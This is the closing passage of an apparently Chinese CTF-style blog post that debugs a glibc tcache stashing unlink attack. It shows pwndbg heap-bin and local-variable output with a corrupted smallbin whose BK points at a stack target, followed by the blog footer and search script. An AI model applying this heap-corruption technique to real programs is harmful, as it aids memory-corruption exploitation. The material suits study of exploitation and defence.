<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  6]: 0x5555557573a0 —▸ 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0xa0 [corrupted]</span><br><span class="line">FD: 0x555555757390 —▸ 0x5555557576c0 ◂— 0x0</span><br><span class="line">BK: 0x7fffffffde90 ◂— 0x0</span><br><span class="line">largebins</span><br><span class="line">empty</span><br></pre></td></tr></table></figure>

<p>可以看到确实是这样：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> info locals</span> </span><br><span class="line">stack_var = &#123;0, 0, 93824994341792, 0, 140737351834928, 0 &lt;repeats 11 times&gt;&#125;</span><br><span class="line">chunk_lis = &#123;0x555555757260, 0x555555757300, 0x5555557573a0, 0x555555757440, 0x5555557574e0, 0x555555757581, 0x555555757620, 0x5555557576c0, 0x555555757760, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0&#125;</span><br><span class="line">target = 0x7fffffffde90</span><br><span class="line">__PRETTY_FUNCTION__ = &quot;main&quot;</span><br></pre></td></tr></table></figure>






















































                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2021/08/08/pwn%E5%B0%8F%E6%80%BB%E7%BB%93/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-09-01
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/PWN/" title="PWN">
              <b>#</b> PWN
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2021/09/12/BUU-WEB-0x20-0x2F/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                

                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Tcache_stashing_unlink_atack%E8%B0%83%E8%AF%95%E8%AE%B0%E5%BD%95 + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2021%2F09%2F01%2Ftcache_stashing_unlink_atack%25E8%25B0%2583%25E8%25AF%2595%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2021/09/01/tcache_stashing_unlink_atack%E8%B0%83%E8%AF%95/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
